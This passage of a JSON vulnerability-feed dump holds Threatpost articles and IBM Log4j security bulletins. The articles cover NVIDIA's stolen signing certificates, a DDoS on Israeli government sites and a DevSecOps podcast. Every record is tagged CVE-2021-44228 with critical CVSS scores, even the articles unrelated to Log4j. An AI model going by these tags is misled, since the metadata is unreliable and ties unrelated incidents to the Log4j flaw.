Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allow a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far -reaching consequences.\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. \u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. \u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s Nation Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. The incident led to the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nHe said the timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks **\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe. Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. \u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\nAlso, \u201ccybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:44", "description": "\n\n(Brought to you by Uptycs. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nApplications are cybercriminals\u2019 favorite ways to crack open targeted organizations.\n\nYet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.\n\nAlex Rice, CTO at HackerOne and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts.\n\nThey dropped by the Threatpost podcast recently to share tips on [DevSecOps](<https://threatpost.com/apps-built-better-devsecops-security-silver-bullet/167793/>), including:\n\n * How to build a continual testing, monitoring, and feedback processes to drive down application risk.\n * Developing a continuous approach to application security and DevOps security tools.\n * Why collaboration and continual feedback is essential across development, cloud and security teams.\n\n\u2026as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!\n\nHeads-up: Along with Aron Eidleman, Partner Solutions Architect at AWS, Alex and Johnathan will be participating in a joint[ webinar](<https://www.hackerone.com/events/mitigate-risk-cloud-ethical-hackers-and-devops?utm_source=gitlab&utm_medium=partner&utm_campaign=social-mitigate-risk-cloud-with-hackers-devops>) on Feb. 23 to discuss the importance of layering security practices into your DevOps workflows.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/021422_GitLab_HackerOne_Mixdown_1.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:00:14", "type": "threatpost", "title": "Kill Cloud Risk: Get Everybody to Stop Fighting Over App Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:00:14", "id": "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "href": "https://threatpost.com/killing-cloud-risk-bulletproofing-app-security-podcast/178486/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-10-01T01:45:31", "description": "## Summary\n\nNo action is required for Tasktop Viz or Tasktop Sync or IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition as they were not impacted by this vulnerability. Sync or IBM LIA is using Log4J 1.2.15, which is very old and not subject to the Log4J vulnerability. The vulnerability was found in 2.15, but Sync is using 1.2.15\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nNone\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\nNo action is required for Tasktop Viz or Tasktop Sync/IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition as they were not impacted by this vulnerability. \n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWMXJ\",\"label\":\"Rational Lifecycle Integration Adapters\"},\"Component\":\"Tasktop\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.20 - 4.28, 1.2.0.12 - 1.2.0.20\",\"Edition\":\"IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition and Tasktop Sync\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:49:17", "type": "ibm", "title": "Security Bulletin: A Remote Attack Vulnerability in Apache Log4j affects IBM Engineering Lifecycle Optimization - Integration Adapters Tasktop Edition and Tasktop Sync", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T16:49:17", "id": "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "href": "https://www.ibm.com/support/pages/node/6527188", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:33", "description": "## Summary\n\nCrypto Hardware Initialization and Maintenance (CHIM 3.0.0) as shipped with CCA 7.2.55 for MTM 4769 is affected by a vulnerability in Apache Log4J (CVE-2021-44228). CHIM is using Apache Log4J for internal logging purposes of regular user activity.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.0 for CCA 7.2.55 for MTM 4769 (setup4769_7.2.55.bin) \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading: \n\nProduct(s)| Fixed Version(s) \n---|--- \nCrypto Hardware Initialization and Maintenance (CHIM)| CHIM 3.0.1 for CCA 7.2.55 for MTM 4769 (setup4769_chim_log4j_patch_7.2.55.bin) \n \n## Workarounds and Mitigations\n\nFor local administrative purposes the Crypto Node Management (CNM) tool can be used instead of Crypto Hardware Initialization and Maintenance (CHIM) for most administrative tasks.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nCCA Software Download Page: <https://www.ibm.com/security/cryptocards/pciecc4/software>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n04 January 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HW19X\",\"label\":\"Other xSeries\"},\"Component\":\"MTM 4769 - Crypto Hardware Installation and Maintenance Tool\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"MTM 4769 - CHIM 3.0.0.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T16:53:29", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4J adressed in Crypto Hardware Initialization and Maintenance (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": 